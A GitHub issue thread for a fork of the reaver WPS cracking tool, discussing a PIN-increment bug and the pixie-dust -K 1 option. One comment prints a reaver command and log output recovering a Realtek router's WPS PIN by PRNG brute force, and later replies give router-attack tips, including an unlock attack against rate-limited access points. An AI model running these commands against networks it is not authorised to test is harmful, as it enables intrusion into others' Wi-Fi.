t6x/reaver-wps-fork-t6x #44: Brute Force never increments PIN and with K 1 if a pin is found it just hangs

eliddell1, 2015-12-22:
Two issues i am noticing.. if i just run a normal brute force it will always  retry the same pin 12345670 and never increment to the next pin..  Thats frustrating to say the least..  Also i have noticed that often when using the -N -K 1 option i can successfully get the pin but it never gives me the psk.. instead i have to run wpa_cli / wps_reg [BSSID] [PIN FOUND] to get the psk..  don't know why?   also once i got a message when running -K 1 that a pin was not found but that the target maybe vulnerable to -K 4.. what is -K 4  infact what are all the -K options?

soxrok2212, 2015-12-24:
Regards to both problems: does the same thing happen for ALL access points? Different models? Etc?

There is no such thing as -K 4, the option that came up was probably -f. -f is a pixiewps command used against Realtek based APs when the nonce is not generated within the same second as E-S1 and E-S2. I'm actually not sure if you can use -f in Reaver or if you have to manually use -f in pixiewps, I've always had success without the full brute force.

kcdtv, 2015-12-26:
My realteck acess point requires -f option 
i'll be home in a cople of days and will be able to tell you if the option can be run straightforward in reaver or if you have to do it with pixiewps.

Than, remember that rt3070 devices work very bad with reaver.
Since the first version.
Try with bully, it works fine with rt3070 and the mod is very easy to do to get the element for pixiedust.

kcdtv, 2016-01-15:
sorry for the delay....
I tried at home with reaver + pixiewps 1.2 against a supported realtek that requires the full brute force option.
i launched reaver with argument -k 1  
```
sudo reaver -i wlan0mon -b B8:55:10:020:A1 -vv -K 1
```
I got to m3 mensage and pixiedust is automatically launched
It doesn't find the PIN at first
```
[+] Waiting for beacon from B8:55:10:02:F0:A1
[+] Switching wlan0mon to channel 11
[+] Associated with B8:55:10:02:F0:A1 (ESSID: TOTOLINK N301RT)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Running pixiewps with the information, wait ...
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.2
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust]   [*] Time taken: 0 s 690 ms
[Pixie-Dust]  
```
But is is launched automatically a second time with the -f option
```
[Pixie-Dust]   [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
[Pixie-Dust]  
[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.2
[Pixie-Dust]  
[Pixie-Dust]   [*] PRNG Seed:  1344583431 (Fri Aug 10 07:23:51 2012 UTC)
[Pixie-Dust]   [*] Mode:       3 (RTL819x)
[Pixie-Dust]   [*] PSK1:       13:a8:23:9f:87:2e:f0:8b:35:52:98:dd:7e:00:fc:33
[Pixie-Dust]   [*] PSK2:       bd:38:5e:36:73:1b:c8:47:34:eb:3a:00:b2:e8:eb:60
[Pixie-Dust]   [*] E-S1:       2f:21:67:dc:17:8a:e1:23:08:eb:11:50:63:6c:2a:b7
[Pixie-Dust]   [*] E-S2:       2f:21:67:dc:17:8a:e1:23:08:eb:11:50:63:6c:2a:b7
[Pixie-Dust]   [+] WPS pin:    03004203
[Pixie-Dust]
```

You see that ES-1 = ES2 and pixiewps see it too, that why it knows that the device can be brute forced with the --force option 

and than i can recover the wpa passphrase with the PIN - automatically

So there is no doubt about it : 
If you use -K 1 in your reaver line you will execute automatically pixewps a second time with the "--force" option if the device is vulnerable and requires it.

kcdtv, 2016-03-22:
About your second issue
<quote> Also i have noticed that often when using the -N -K 1 option i can successfully get the pin but it never gives me the psk..</quote>
That's maybe why the option -N is not enabled by default...  :;): you should try with a basic syntax first (adding **-n** is a good trick, in lower case, not upper case)

closed 2016-03-22 by kcdtv

gates1, 2016-11-25:
Hi there...I want to Hack TP_LINK Router with wps enabled ....I tried it to much with reaver and pixiewps...the reaver gets lock up....after some pin trying....and the pixiewps sasys that the (wps pin not found...)...
and also tried ths Boardcom router...so it's the same like TP-LINK ...Problem...so if have any good suggestion or solution so please update me ...Thanks...

gates1, 2016-11-25:
Model: Boardcom modem...Model number 123456...serial number 1234....Device name BoardcomAP....authentication wpa_PSK/TKIP

kcdtv, 2016-11-25:
Your router is not vulnerable to pixiewps and has an AP rate limit enabled.
    God for you! 
Even-though it would be better to disable it... You never know: somebody might try to hack it and be lucky.

gates1, 2016-11-25:
if I'm not lucky to hack it...SO nobody can it...Cause know my handshake capture...that how much i secure the psk key...Thanks too much..

gates1, 2016-11-25:
I just enable the wps for to try that it can be hackable or not...

easy-rhino, 2016-12-05:
Try using ReVdK3 (present in Wifslax), it can do an unlock attack against locked routers.

warbd, 2017-08-06:
this one worked for me :)
https://www.youtube.com/watch?v=leqBKAEqI1Q